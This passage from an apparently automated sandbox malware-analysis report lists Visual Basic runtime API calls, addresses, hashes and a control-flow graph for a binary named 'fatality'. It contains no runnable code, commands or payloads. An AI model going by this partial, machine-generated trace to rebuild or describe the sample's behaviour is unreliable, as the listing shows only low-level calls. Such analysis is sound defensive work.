• __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410384
• #616.MSVBVM60(?,?,?,00000000), ref: 00410399
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 004103A7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004103BE
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 004103CA
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004103DB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,0040614C,?,00000001,?,00000000), ref: 00410402
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00410410
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000,?,00000000), ref: 0041041C
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041042A
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 00410433
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410459
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128,?,00000000), ref: 0041049A
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004104B0
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?,?,00000000), ref: 004104C9
                                                                                                                                                            • CloseHandle.KERNELBASE(?), ref: 004104ED
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0041054B), ref: 00410517
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041052F
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410538
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410544
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$Free$AnsiMoveSystem$#525#616BoundsBstrChkstkCloseConstruct2CopyDestructGenerateHandleListUnicode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2038761106-0
                                                                                                                                                            • Opcode ID: 0e7fc902b34ffcf9e67cdb1769bf0c1f0fb471222fd1f6da1b4fc70dbbb803ea
                                                                                                                                                            • Instruction ID: ed4df61ca57589e4cb6a89f15fcf2a92bf343cb87a1231b53511e749ac9c114a
                                                                                                                                                            • Opcode Fuzzy Hash: 0e7fc902b34ffcf9e67cdb1769bf0c1f0fb471222fd1f6da1b4fc70dbbb803ea
                                                                                                                                                            • Instruction Fuzzy Hash: D9A13EB5901218DFDB14DFA0DE4DBDEB7B4BB48304F1081A9E50AB72A0DB745A84CF54

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00408C5A
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408C67
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408C77
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408C8F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00408CA3
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408CB0
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408CC0
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408CD8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00408CEC
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408CF9
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408D09
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408D21
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00408D35
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408D42
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408D52
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408DB5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408DC0
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DCE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408DD9
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408DE5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408DF0
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DFD
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E08
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E16
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E21
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E2D
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E38
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E46
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E51
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E5E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E69
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E75
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408EB2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408ECE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408ED9
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408EE7
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408EF2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408EFE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F09
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F16
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F21
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F2F
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F3A
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F46
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F51
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F5F
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F6A
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F77
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F82
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F8E
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408FCB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408FE7
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408FF2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409000
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040900B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409017
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000), ref: 0040903C
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00409057
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409062
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409070
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040907B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409087
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409092
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090A0
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090AB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090B8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090C3
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 004090CF
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090DA
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090E8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090F3
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409101
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040910C
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409118
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409123
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409130
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040913B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409149
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409154
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409160
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040916B
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004091A9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409022
                                                                                                                                                              • Part of subcall function 00410180: CloseHandle.KERNELBASE(?), ref: 004104ED
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(0041054B), ref: 00410517
                                                                                                                                                              • Part of subcall function 00410180: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041052F
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410538
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410544
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F99
                                                                                                                                                              • Part of subcall function 00410180: __vbaGenerateBoundsError.MSVBVM60 ref: 0041031D
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041035E
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041036F
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410384
                                                                                                                                                              • Part of subcall function 00410180: #616.MSVBVM60(?,?,?,00000000), ref: 00410399
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 004103A7
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004103BE
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 004103CA
                                                                                                                                                              • Part of subcall function 00410180: __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004103DB
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(?,0040614C,?,00000001,?,00000000), ref: 00410402
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 00410410
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(0040614C,00000000,?,00000000), ref: 0041041C
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 0041042A
                                                                                                                                                              • Part of subcall function 00410180: __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 00410433
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410459
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128,?,00000000), ref: 0041049A
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004104B0
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?,?,00000000), ref: 004104C9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E80
                                                                                                                                                              • Part of subcall function 00410180: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00409D5A,00000000), ref: 0041019E
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004101CE
                                                                                                                                                              • Part of subcall function 00410180: __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004101DF
                                                                                                                                                              • Part of subcall function 00410180: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004101EE
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041020A
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410244
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041025A
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410273
                                                                                                                                                              • Part of subcall function 00410180: #525.MSVBVM60(00000104), ref: 0041029C
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60 ref: 004102A7
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004102DE
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410338
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000,00000000), ref: 004091D2
                                                                                                                                                            • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 00409245
                                                                                                                                                            • __vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040925D
                                                                                                                                                            • #600.MSVBVM60(00000008,00000000), ref: 00409273
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00409282
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60 ref: 004092A4
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004092B9
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004092CD
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004092DA
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004092EA
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040930E
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405A00,0000005C), ref: 00409354
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$Copy$List$Error$System$Ansi$#516#631$Bstr$#525#537#580#600#616BoundsCheckChkstkCloseConstruct2DestructGenerateHandleHresultUnicode
                                                                                                                                                            • String ID: PR$ RO$ SE$Once$~
                                                                                                                                                            • API String ID: 4272439835-1255219571

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 200 407a50-407aba __vbaChkstk 202 407ad8 200->202 203 407abc-407ad6 __vbaNew2 200->203 204 407ae2-407b15 202->204 203->204 206 407b17-407b38 __vbaHresultCheckObj 204->206 207 407b3a 204->207 208 407b44-407b75 206->208 207->208 210 407b77-407b98 __vbaHresultCheckObj 208->210 211 407b9a 208->211 212 407ba4-407bc4 __vbaFreeObj 210->212 211->212 213 407bd3-407be1 212->213 214 407bc6-407bcd __vbaEnd 212->214 215 407be3-407bfd __vbaNew2 213->215 216 407bff 213->216 214->213 217 407c09-407c3c 215->217 216->217 219 407c61 217->219 220 407c3e-407c5f __vbaHresultCheckObj 217->220 221 407c6b-407c97 219->221 220->221 223 407c99-407cba __vbaHresultCheckObj 221->223 224 407cbc 221->224 225 407cc6-407cf6 __vbaFreeObj 223->225 224->225 227 407cf8-407d19 __vbaHresultCheckObj 225->227 228 407d1b 225->228 229 407d25-407d33 227->229 228->229 230 407d51 229->230 231 407d35-407d4f __vbaNew2 229->231 232 407d5b-407d8e 230->232 231->232 234 407d90-407db1 __vbaHresultCheckObj 232->234 235 407db3 232->235 236 407dbd-407deb 234->236 235->236 238 407e10 236->238 239 407ded-407e0e __vbaHresultCheckObj 236->239 240 407e1a-407e70 #618 __vbaStrMove __vbaStrCmp __vbaFreeStrList __vbaFreeObj 238->240 239->240 241 407e76-407e84 240->241 242 407f98-407fa6 240->242 243 407ea2 241->243 244 407e86-407ea0 __vbaNew2 241->244 245 407fc4 242->245 246 407fa8-407fc2 __vbaNew2 242->246 248 407eac-407edf 243->248 244->248 247 407fce-408001 245->247 246->247 251 408003-408024 __vbaHresultCheckObj 247->251 252 408026 247->252 253 407ee1-407f02 __vbaHresultCheckObj 248->253 254 407f04 248->254 255 408030-40805e 251->255 252->255 256 407f0e-407f3c 253->256 254->256 259 408060-408081 __vbaHresultCheckObj 255->259 260 408083 255->260 261 407f61 256->261 262 407f3e-407f5f __vbaHresultCheckObj 256->262 263 40808d-4080b3 __vbaStrCat __vbaStrMove 
__vbaFreeStr __vbaFreeObj 259->263 260->263 264 407f6b-407f93 __vbaStrMove __vbaFreeObj 261->264 262->264 265 4080b9-408110 __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList 263->265 264->265 268 408112-40812c __vbaNew2 265->268 269 40812e 265->269 270 408138-40816b 268->270 269->270 272 408190 270->272 273 40816d-40818e __vbaHresultCheckObj 270->273 274 40819a-4081c8 272->274 273->274 276 4081ca-4081eb __vbaHresultCheckObj 274->276 277 4081ed 274->277 278 4081f7-4087e2 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #517 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaFreeObj __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #517 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #517 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove #517 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList call 4125a0 276->278 277->278 304 4087e7-40885d __vbaOnError #669 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaStrCopy __vbaStrCmp 278->304 
305 4088bb-4088d6 __vbaStrCmp 304->305 306 40885f-4088b6 call 418c90 * 2 __vbaEnd 304->306 308 408979-408994 __vbaStrCmp 305->308 309 4088dc-4088f5 call 4125a0 305->309 310 408a32-408c4f __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove #517 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 306->310 308->310 311 40899a-4089b3 call 4125a0 308->311 321 408937-408974 #600 __vbaEnd 309->321 322 4088f7-408931 call 40fba0 call 415660 #580 309->322 325 4089f5-408a2c #600 __vbaEnd 311->325 326 4089b5-4089ef call 40fba0 call 415660 #580 311->326 321->310 322->321 325->310 326->325
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 004125A0: __vbaI2I4.MSVBVM60 ref: 004126C7
                                                                                                                                                              • Part of subcall function 004125A0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004126D2
                                                                                                                                                              • Part of subcall function 004125A0: __vbaI2I4.MSVBVM60 ref: 004126E2
                                                                                                                                                              • Part of subcall function 004125A0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004126EF
                                                                                                                                                              • Part of subcall function 004125A0: __vbaStrMove.MSVBVM60(?), ref: 0041270A
                                                                                                                                                              • Part of subcall function 004125A0: __vbaStrCopy.MSVBVM60 ref: 00412728
                                                                                                                                                              • Part of subcall function 004125A0: __vbaStrMove.MSVBVM60(00000003), ref: 00412739
                                                                                                                                                              • Part of subcall function 004125A0: #616.MSVBVM60(00000000), ref: 00412740
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,00000000), ref: 004087F5
                                                                                                                                                            • #669.MSVBVM60 ref: 00408802
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040880D
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040881A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00408823
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040883C
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00405B3C,?), ref: 00408855
                                                                                                                                                            • __vbaEnd.MSVBVM60(80000002,00000000,00000000,00000000,80000002,00000000,00000000,00000000), ref: 004088B0
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00405E88,?), ref: 004088CE
                                                                                                                                                            • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B078,00000000), ref: 00408931
                                                                                                                                                            • #600.MSVBVM60(00004008,00000000,00000000), ref: 0040895B
                                                                                                                                                            • __vbaEnd.MSVBVM60 ref: 0040896E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408A41
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00408A5B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 00408A62
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408A6D
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408A7A
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00408A8E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408AA6
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00408AC1
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 00408AC8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408AD3
                                                                                                                                                            • #517.MSVBVM60(00000000), ref: 00408ADA
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408AE5
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408AF2
                                                                                                                                                              • Part of subcall function 00418C90: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409F3C,80000002,00000000), ref: 00418CAE
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CDB
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CE7
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CF3
                                                                                                                                                              • Part of subcall function 00418C90: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00418D02
                                                                                                                                                              • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6), ref: 00418D1B
                                                                                                                                                              • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004025E6), ref: 00418D2B
